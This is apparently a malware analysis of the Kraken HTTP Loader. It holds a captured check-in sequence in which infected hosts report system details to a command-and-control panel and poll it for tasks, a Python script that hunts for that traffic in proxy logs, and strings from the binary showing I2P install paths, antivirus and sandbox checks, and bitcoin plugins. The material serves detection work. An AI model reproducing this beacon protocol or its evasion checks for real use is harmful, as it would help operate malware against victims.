- Kraken HTTP Loader - 2015
- GET http://94.156.xxx.xxx/panel/includes/verif.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:22 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 1
- --
- GET http://94.156.xxx.xxx/panel/includes/fileupload.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:23 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=vgm1ffpdpgjeojfn4jo9cf6ij1; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/f_i_l_e_h_o_s_t.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:24 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=6thrarifgctqil07hgpi7veut2; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/persis.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:25 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=df5vcfuhp06buj5sttss824e02; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/btcplugin.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:26 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=el5341ajdcecaa316mro7tssg1; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 0
- Connection: close
- Content-Type: text/html
- --
- GET http://94.156.xxx.xxx/panel/includes/d_elay.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:31 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=ljhhe8nescblgvn00cu74sb7s7; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 5
- Connection: close
- Content-Type: text/html
- 60000
- --
- GET http://94.156.xxx.xxx/panel/includes/day.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:33 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 8
- Connection: close
- Content-Type: text/html
- 20150205
- --
- GET http://94.156.xxx.xxx/panel/includes/ip.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:34 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 13
- Connection: close
- Content-Type: text/html
- xxx.xxx.xxx.xxx
- --
- GET http://94.156.xxx.xxx/panel/includes/country.php?IP=xxx.xxx.xxx.xxx HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:36 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 9
- Connection: close
- Content-Type: text/html
- Australia
- --
- GET /panel/includes/idcontact.php?COMPUTER=xxxxx-PC-49&steam=0&origin=0&webnavig=1&java=0&net=1&memoireRAMbytes=1073274880&diskhard=68611469312&avname=0&parefire=0&install=20150205&gpu=0&cpu=Intel(R)Core(TM)i7-4710MQCPU@2.50GHz HTTP/1.0
- Host: 94.156.xxx.xxx
- User-Agent: crackim
- Connection: Close
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:37 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=6ia3s0tisrn2ek2scvr2evfp72; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 14
- Connection: close
- Content-Type: text/html
- Statistics Ok!
- --
- GET http://94.156.xxx.xxx/panel/includes/bkill.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:38 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=12nvu44selb1d89dghcc0g9bs4; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/install_info.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:40 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 8
- Connection: close
- Content-Type: text/html
- 20150205
- --
- GET http://94.156.xxx.xxx/panel/includes/pinginfo.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:57:47 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 2
- Connection: close
- Content-Type: text/html
- 57
- --
- GET /panel/includes/get.php?IP=xxx.xxx.xxx.xxx&COMPUTER=xxxxx-PC-49&OS=Windows7&COUNTRY=[redacted]&HWID={e29xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}{24 numbers}&INSTALL=20150205&PING=57&INSTAL=20150205&V=1.3&Arch=32 HTTP/1.0
- Host: 94.156.xxx.xxx
- User-Agent: crackim
- Connection: Close
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:57:48 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=bbau8mcveutda9bjbd66prmp56; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 0
- Connection: close
- Content-Type: text/html
- --
- GET http://94.156.xxx.xxx/panel/includes/post.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:57:49 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=qrdsv1aneibeds76bj686flvh3; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 2
- Connection: close
- Content-Type: text/html
- *0
- --
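The capture above is the loader's whole check-in sequence: a liveness probe (verif.php answers 1), a set of feature flags (fileupload, f_i_l_e_h_o_s_t, persis, btcplugin, bkill all answer 0), the beacon interval (d_elay.php answers 60000, i.e. milliseconds), date, public IP and geolocation, a host profile sent to idcontact.php, registration via get.php, and a task poll to post.php that answers *0 when nothing is queued. The script below is an added example, not code from the paste or from the loader's author: it decodes that sequence and hunts for it in proxy logs, scoring the panel endpoint names, the crackim User-Agent and the French-named profile parameters (memoireRAMbytes, parefire, webnavig), and flagging any client that walks several of the panel endpoints even when no User-Agent is logged. The endpoint meanings are inferred from the observed responses (an assumption), the log format is invented, and 203.0.113.5 stands in for the redacted panel address.

```python
"""Decode Kraken HTTP Loader panel traffic and hunt for it in proxy logs.
Added example; endpoint meanings are inferred from the capture (assumption),
the log format and sample lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

PANEL_DIR = "/panel/includes/"
BOT_USER_AGENT = "crackim"   # sent on idcontact.php and get.php in the capture

# Endpoints from the capture (gettask.php appears only in the strings).
KNOWN_ENDPOINTS = {
    "verif.php": "panel liveness ('1' = up)",
    "fileupload.php": "feature flag",
    "f_i_l_e_h_o_s_t.php": "feature flag",
    "persis.php": "persistence flag",
    "btcplugin.php": "bitcoin plugin flag",
    "d_elay.php": "beacon interval in milliseconds",
    "day.php": "panel date YYYYMMDD",
    "ip.php": "victim public IP",
    "country.php": "geolocate the IP from ip.php",
    "idcontact.php": "host profile report",
    "bkill.php": "kill switch ('0' = keep running)",
    "install_info.php": "install date",
    "pinginfo.php": "latency value echoed in get.php",
    "get.php": "bot registration (HWID, OS, version, arch)",
    "post.php": "task poll ('*0' = no task)",
    "gettask.php": "task fetch by RUN= id",
}
# Query keys only this loader's profile/registration requests use.
PROFILE_PARAMS = {"memoireRAMbytes", "diskhard", "parefire", "webnavig",
                  "avname", "HWID", "INSTAL"}

# Constructed log format: src "METHOD url HTTP/x.y" status "user-agent"
LOG_RE = re.compile(r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/1\.[01]" '
                    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')

def parse_log_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def endpoint_name(url):
    """Last path component; url may be absolute (proxy style) or path-only."""
    return urlsplit(url).path.rsplit("/", 1)[-1]

def is_panel_endpoint(url):
    return urlsplit(url).path.startswith(PANEL_DIR) and endpoint_name(url) in KNOWN_ENDPOINTS

def score_request(url, user_agent):
    """Score one request: 2 for a panel endpoint, 3 for the bot UA, 1 per profile key."""
    score, reasons, name = 0, [], endpoint_name(url)
    if is_panel_endpoint(url):
        score += 2
        reasons.append(f"{name}: {KNOWN_ENDPOINTS[name]}")
    if user_agent == BOT_USER_AGENT:
        score += 3
        reasons.append("user-agent 'crackim'")
    hits = PROFILE_PARAMS & set(parse_qs(urlsplit(url).query))
    score += len(hits)
    if hits:
        reasons.append("profile params " + ",".join(sorted(hits)))
    return score, reasons

def decode_profile(url):
    """Turn the idcontact.php query into readable host facts."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return {
        "host": q.get("COMPUTER"),
        "ram_mib": round(int(q["memoireRAMbytes"]) / 2**20) if "memoireRAMbytes" in q else None,
        "disk_gib": round(int(q["diskhard"]) / 2**30, 1) if "diskhard" in q else None,
        "cpu": q.get("cpu"),
        "av_present": q.get("avname", "0") != "0",   # '0' in the capture: no AV dir found
        "firewall": q.get("parefire") == "1",         # 'parefire' ~ French 'pare-feu'
        "install_date": q.get("install"),
    }

def beacon_interval_seconds(d_elay_body):
    """d_elay.php answers in milliseconds ('60000' in the capture)."""
    return int(d_elay_body.strip()) / 1000.0

def hunt(log_text, line_threshold=3, sequence_threshold=3):
    """Flag high-scoring single requests and clients walking several panel endpoints."""
    flagged, seen = [], defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if not rec:
            continue
        score, reasons = score_request(rec["url"], rec["ua"])
        if is_panel_endpoint(rec["url"]):
            seen[rec["src"]].add(endpoint_name(rec["url"]))
        if score >= line_threshold:
            flagged.append((rec["src"], endpoint_name(rec["url"]), score, reasons))
    walks = {src: sorted(n) for src, n in seen.items() if len(n) >= sequence_threshold}
    return flagged, walks

# Constructed sample modelled on the capture; 203.0.113.5 replaces the redacted panel IP.
SAMPLE_LOG = """\
10.0.0.7 "GET http://203.0.113.5/panel/includes/verif.php HTTP/1.0" 200 ""
10.0.0.7 "GET http://203.0.113.5/panel/includes/d_elay.php HTTP/1.0" 200 ""
10.0.0.7 "GET /panel/includes/idcontact.php?COMPUTER=WS-49&steam=0&origin=0&webnavig=1&java=0&net=1&memoireRAMbytes=1073274880&diskhard=68611469312&avname=0&parefire=0&install=20150205&gpu=0&cpu=Intel(R)Core(TM)i7-4710MQCPU@2.50GHz HTTP/1.0" 200 "crackim"
10.0.0.7 "GET /panel/includes/get.php?IP=198.51.100.20&COMPUTER=WS-49&OS=Windows7&COUNTRY=Australia&HWID={00000000-0000-0000-0000-000000000000}&INSTALL=20150205&PING=57&INSTAL=20150205&V=1.3&Arch=32 HTTP/1.0" 200 "crackim"
10.0.0.9 "GET http://www.example.com/panel/includes/index.php HTTP/1.1" 200 "Mozilla/5.0"
"""

if __name__ == "__main__":
    flagged, walks = hunt(SAMPLE_LOG)
    for src, name, score, reasons in flagged:
        print(f"{src} {name} score={score}: {'; '.join(reasons)}")
    print("endpoint walks:", walks)
    print(decode_profile(parse_log_line(SAMPLE_LOG.splitlines()[2])["url"]))
    print("beacon every", beacon_interval_seconds("60000"), "s")
```

The per-line score catches the two requests that carry the crackim User-Agent and the profile keys; the endpoint-walk rule is what catches the plain proxy-style requests (verif.php, d_elay.php and the rest) that carry no distinctive header, since a single client hitting three or more of these names under /panel/includes/ within one session is the loader's check-in pattern and not ordinary browsing. The index.php hit on example.com scores zero because only the exact endpoint names from the capture count.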
- SOME STRINGS
- 0x4120b8 (11): getnameinfo
- 0x4120c4 (12): freeaddrinfo
- 0x4120d4 (11): getaddrinfo
- 0x4120e0 (10): ws2_32.dll
- 0x41301a (38): \System\Oracle\azioklmpx\i2p\jbigi.dll
- 0x413042 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\ieb9oopo.mooo.com.crt
- 0x413086 (22): (x86)\AVAST Software\
- 0x4130a0 (37): i2p/certificates/ssl/link.mx24.eu.crt
- 0x4130c6 (40): \System\Oracle\azioklmpx\i2p\lib\BOB.jar
- 0x4130ef (14): (x86)\Google\
- 0x4130fe (37): i2p/set_config_dir_for_nt_service.bat
- 0x413124 (39): i2p/certificates/ssl/193.150.121.66.crt
- 0x41314c (25): i2p/lib/routerconsole.jar
- 0x41316f (10): persis.php
- 0x413182 (13): i2p/admin.exe
- 0x413190 (26): i2p/lib/jasper-runtime.jar
- 0x4131ab (69): \System\Oracle\azioklmpx\i2p\certificates\reseed\swat_at_mail.i2p.crt
- 0x413207 (13): btcplugin.php
- 0x41321c (55): \System\Oracle\azioklmpx\i2p\lib\jetty-continuation.jar
- 0x413254 (18): i2p/icons/iggy.xpm
- 0x41329f (51): \System\Oracle\azioklmpx\i2p\lib\jetty-security.jar
- 0x4132d3 (41): i2p/certificates/news/zzz_at_mail.i2p.crt
- 0x413342 (18): i2p/lib/jrobin.jar
- 0x413355 (12): kit47896.exe
- 0x413362 (15): 414fileh0st.exe
- 0x413372 (35): \System\Oracle\azioklmpx\search.exe
- 0x413396 (45): i2p/certificates/reseed/bugme_at_mail.i2p.crt
- 0x4133c4 (16): i2p/lib/jstl.jar
- 0x4133d5 (42): \System\Oracle\azioklmpx\i2p\lib\jbigi.jar
- 0x413400 (33): \System\Oracle\azioklmpx\i2p\lib\
- 0x413424 (49): \System\Oracle\azioklmpx\i2p\certificates\reseed\
- 0x413467 (54): \System\Oracle\azioklmpx\i2p\lib\org.mortbay.jetty.jar
- 0x41349e (29): \System\Oracle\azioklmpx\i2p\
- 0x4134be (13): (x86)\Opera\
- 0x4134d4 (40): \System\Oracle\azioklmpx\i2p\lib\sam.jar
- 0x41350f (41): \System\Oracle\azioklmpx\i2p\lib\jstl.jar
- 0x413541 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\jp.reseed.i2p2.no.crt
- 0x4135d4 (15): country.php?IP=
- 0x4135e6 (70): \System\Oracle\azioklmpx\i2p\certificates\router\str4d_at_mail.i2p.crt
- 0x41363a (10): &COMPUTER=
- 0x413645 (66): \System\Oracle\azioklmpx\i2p\certificates\news\zzz_at_mail.i2p.crt
- 0x413688 (26): i2p/lib/jetty-servlets.jar
- 0x4136c0 (64): \System\Oracle\azioklmpx\i2p\certificates\ssl\193.150.121.66.crt
- 0x413706 (52): \System\Oracle\azioklmpx\i2p\lib\commons-logging.jar
- 0x41374f (61): \System\Oracle\azioklmpx\i2p\certificates\ssl\reseed.info.crt
- 0x41378d (38): \System\Oracle\azioklmpx\i2p\value.txt
- 0x4137e8 (48): \System\Oracle\azioklmpx\i2p\webapps\susidns.war
- 0x413819 (46): \System\Oracle\azioklmpx\i2p\lib\streaming.jar
- 0x413848 (25): i2p/lib/jetty-servlet.jar
- 0x413862 (18): i2p/icons/iggy.ico
- 0x413875 (20): i2p/lib/jetty-io.jar
- 0x4139a1 (38): i2p/certificates/ssl/netdb.i2p2.no.crt
- 0x4139c8 (16): install_info.php
- 0x4139ec (47): \System\Oracle\azioklmpx\i2p\lib\mstreaming.jar
- 0x413a1c (45): \System\Oracle\azioklmpx\i2p\lib\jetty-io.jar
- 0x413a4a (14): (x86)\comodo\
- 0x413b5a (25): i2p/lib/javax.servlet.jar
- 0x413b74 (21): i2p/lib/i2ptunnel.jar
- 0x413b8a (44): i2p/certificates/reseed/swat_at_mail.i2p.crt
- 0x413bb7 (11): (x86)\AVG\
- 0x413bc3 (52): \System\Oracle\azioklmpx\i2p\lib\jetty-sslengine.jar
- 0x413c17 (70): \System\Oracle\azioklmpx\i2p\certificates\news\echelon_at_mail.i2p.crt
- 0x413c78 (36): \System\Oracle\azioklmpx\ext\ext.txt
- 0x413c9d (46): \System\Oracle\azioklmpx\i2p\lib\jetty-xml.jar
- 0x413cd8 (24): i2p/geoip/geoipv6.dat.gz
- 0x413d1e (11): i2p/i2p.exe
- 0x413d3e (47): i2p/certificates/reseed/echelon_at_mail.i2p.crt
- 0x413d76 (49): \System\Oracle\azioklmpx\i2p\scripts\i2pProxy.pac
- 0x413db5 (47): \System\Oracle\azioklmpx\i2p\lib\desktopgui.jar
- 0x413de5 (34): \System\Oracle\azioklmpx\unrar.lib
- 0x413e08 (13): (x86)\Steam\
- 0x413e16 (34): i2p/lib/jetty-java5-threadpool.jar
- 0x413e39 (17): &memoireRAMbytes=
- 0x413e55 (22): i2p/lib/jetty-http.jar
- 0x413e6f (33): i2p/install_i2p_service_winnt.bat
- 0x413e91 (30): \System\Oracle\azioklmpx\hzid\
- 0x413eb0 (20): i2p/lib/standard.jar
- 0x413ec5 (45): i2p/certificates/reseed/sindu_at_mail.i2p.crt
- 0x413f11 (47): \System\Oracle\azioklmpx\i2p\lib\jetty-util.jar
- 0x413f4f (50): i2p/certificates/router/killyourtv_at_mail.i2p.crt
- 0x413f8d (18): i2p/lib/router.jar
- 0x413fac (45): \System\Oracle\azioklmpx\i2p\lib\standard.jar
- 0x413fda (22): i2p/lib/commons-el.jar
- 0x413ff1 (16): gettask.php?RUN=
- 0x414002 (17): i2p/lib/jbigi.jar
- 0x4140df (16): \bitck1\Text.txt
- 0x41410a (29): i2p/lib/org.mortbay.jetty.jar
- 0x414131 (62): \System\Oracle\azioklmpx\i2p\certificates\ssl\link.mx24.eu.crt
- 0x414170 (24): i2p/lib/jetty-webapp.jar
- 0x41418c (40): \System\Oracle\azioklmpx\i2p\wrapper.log
- 0x4141b5 (14): (x86)\McAfee\
- 0x4141d3 (75): \System\Oracle\azioklmpx\i2p\certificates\router\killyourtv_at_mail.i2p.crt
- 0x4142d5 (14): fileupload.php
- 0x4142f7 (49): \System\Oracle\azioklmpx\i2p\lib\jetty-webapp.jar
- 0x41432f (23): \System\Oracle\smss.exe
- 0x414392 (46): \System\Oracle\azioklmpx\i2p\lib\systray4j.dll
- 0x4143c1 (46): i2p/certificates/reseed/backup_at_mail.i2p.crt
- 0x4143f0 (19): i2p/lib/wrapper.dll
- 0x414409 (25): i2p/webapps/i2ptunnel.war
- 0x41443e (23): i2p/webapps/susidns.war
- 0x414456 (21): i2p/lib/streaming.jar
- 0x41446c (11): sandboxfuck
- 0x41447c (15): i2p/wrapper.log
- 0x414499 (10): d_elay.php
- 0x4144d6 (43): \System\Oracle\azioklmpx\i2p\wrapper.config
- 0x414502 (48): \System\Oracle\azioklmpx\i2p\geoip\countries.txt
- 0x414533 (44): \System\Oracle\azioklmpx\i2p\geoip\geoip.txt
- 0x414572 (42): i2p/certificates/ssl/us.reseed.i2p2.no.crt
- 0x4145a5 (23): i2p/geoip/countries.txt
- 0x4145bd (58): \System\Oracle\azioklmpx\i2p\install_i2p_service_winnt.bat
- 0x4145f8 (42): i2p/certificates/ssl/uk.reseed.i2p2.no.crt
- 0x414623 (19): i2p/geoip/geoip.txt
- 0x414637 (37): \System\Oracle\azioklmpx\i2p\scripts\
- 0x41465d (71): \System\Oracle\azioklmpx\i2p\certificates\ssl\reseed.i2p-projekt.de.crt
- 0x4146a5 (19): i2p/lib/systray.jar
- 0x4146b9 (37): \System\Oracle\azioklmpx\i2p\webapps\
- 0x4146f2 (37): i2p/certificates/ssl/i2p.mooo.com.crt
- 0x414718 (42): i2p/certificates/ssl/cert.smartcom.org.crt
- 0x414743 (21): i2p/lib/jetty-xml.jar
- 0x414759 (30): i2p/lib/jetty-continuation.jar
- 0x414781 (27): i2p/lib/jasper-compiler.jar
- 0x41479d (58): \System\Oracle\azioklmpx\i2p\lib\jetty-rewrite-handler.jar
- 0x4147e7 (12): pinginfo.php
- 0x4147f4 (49): \System\Oracle\azioklmpx\i2p\geoip\geoipv6.dat.gz
- 0x414826 (35): \System\Oracle\azioklmpx\i2p\geoip\
- 0x41484a (26): i2p/lib/jetty-security.jar
- 0x414865 (47): \System\Oracle\azioklmpx\i2p\certificates\news\
- 0x41489d (43): \System\Oracle\azioklmpx\i2p\systray.config
- 0x414981 (42): \System\Oracle\azioklmpx\i2p\certificates\
- 0x4149ac (14): (x86)\G Data\
- 0x4149bb (51): \System\Oracle\azioklmpx\i2p\lib\jasper-runtime.jar
- 0x4149ef (24): C:\Program Files\McAfee\
- 0x414a80 (46): \System\Oracle\azioklmpx\i2p\lib\systray4j.jar
- 0x414ab8 (75): \System\Oracle\azioklmpx\i2p\certificates\reseed\killyourtv_at_mail.i2p.crt
- 0x414b58 (43): \System\Oracle\azioklmpx\i2p\lib\jrobin.jar
- 0x414b84 (19): i2p/lib/wrapper.jar
- 0x414b98 (27): i2p/lib/org.mortbay.jmx.jar
- 0x414bb4 (23): i2p/lib/jetty-start.jar
- 0x414bcc (21): (x86)\Kaspersky Lab\
- 0x414c47 (52): \System\Oracle\azioklmpx\i2p\webapps\addressbook.war
- 0x414d2e (43): i2p/certificates/news/str4d_at_mail.i2p.crt
- 0x414f58 (22): i2p/lib/mstreaming.jar
- 0x414f7a (21): i2p/lib/systray4j.dll
- 0x414f90 (77): User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
- 0x414fde (12): (x86)\ESET\
- 0x415089 (46): \System\Oracle\azioklmpx\i2p\lib\jetty-i2p.jar
- 0x4150b8 (13): btcplugin.exe
- 0x4150c6 (38): \System\Oracle\azioklmpx\i2p\admin.exe
- 0x415154 (10): &diskhard=
- 0x41525a (29): i2p/webapps/routerconsole.war
- 0x4153c2 (52): \System\Oracle\azioklmpx\i2p\lib\jasper-compiler.jar
- 0x415410 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\us.reseed.i2p2.no.crt
- 0x41547f (24): i2p/scripts/i2pProxy.pac
- 0x41563a (10): &webnavig=
- 0x41564c (22): i2p/lib/jetty-util.jar
- 0x415663 (15): i2p/lib/BOB.jar
- 0x415673 (23): idcontact.php?COMPUTER=
- 0x41568b (68): \System\Oracle\azioklmpx\i2p\certificates\router\zzz_at_mail.i2p.crt
- 0x4156d0 (15): Virtual_Machine
- 0x4156e0 (40): \System\Oracle\azioklmpx\i2p\lib\i2p.jar
- 0x415709 (33): i2p/lib/jetty-rewrite-handler.jar
- 0x41572b (39): \System\Oracle\azioklmpx\i2p\jcpuid.dll
- 0x4159fa (38): \System\Oracle\azioklmpx\hzid\hzid.txt
- 0x415a8c (32): \System\Oracle\azioklmpx\key.exe
- 0x415b29 (47): \System\Oracle\azioklmpx\i2p\lib\commons-el.jar
- 0x415bae (10): &parefire=
- 0x415bb9 (10): click.pack
- 0x415c67 (33): (x86)\Malwarebytes Anti-Malware\
- 0x415ccb (19): (x86)\BitDefender\
- 0x415cdf (19): f_i_l_e_h_o_s_t.php
- 0x415cf3 (44): i2p/certificates/reseed/meeh_at_mail.i2p.crt
- 0x415d20 (39): (x86)\AntiVir PersonalEdition Classic\
- 0x415e60 (50): \System\Oracle\azioklmpx\i2p\lib\javax.servlet.jar
- 0x415e93 (46): \System\Oracle\azioklmpx\i2p\lib\i2ptunnel.jar
- 0x416185 (27): i2p/lib/jetty-sslengine.jar
- 0x4161a1 (32): (x86)\Norton Internet Security\
- ---
- Refs:
- http://blogs.quickheal.com/wp/malware-case-study-kraken-rat-running-behind-bitcoins/
- https://ica.su/showthread.php?t=82234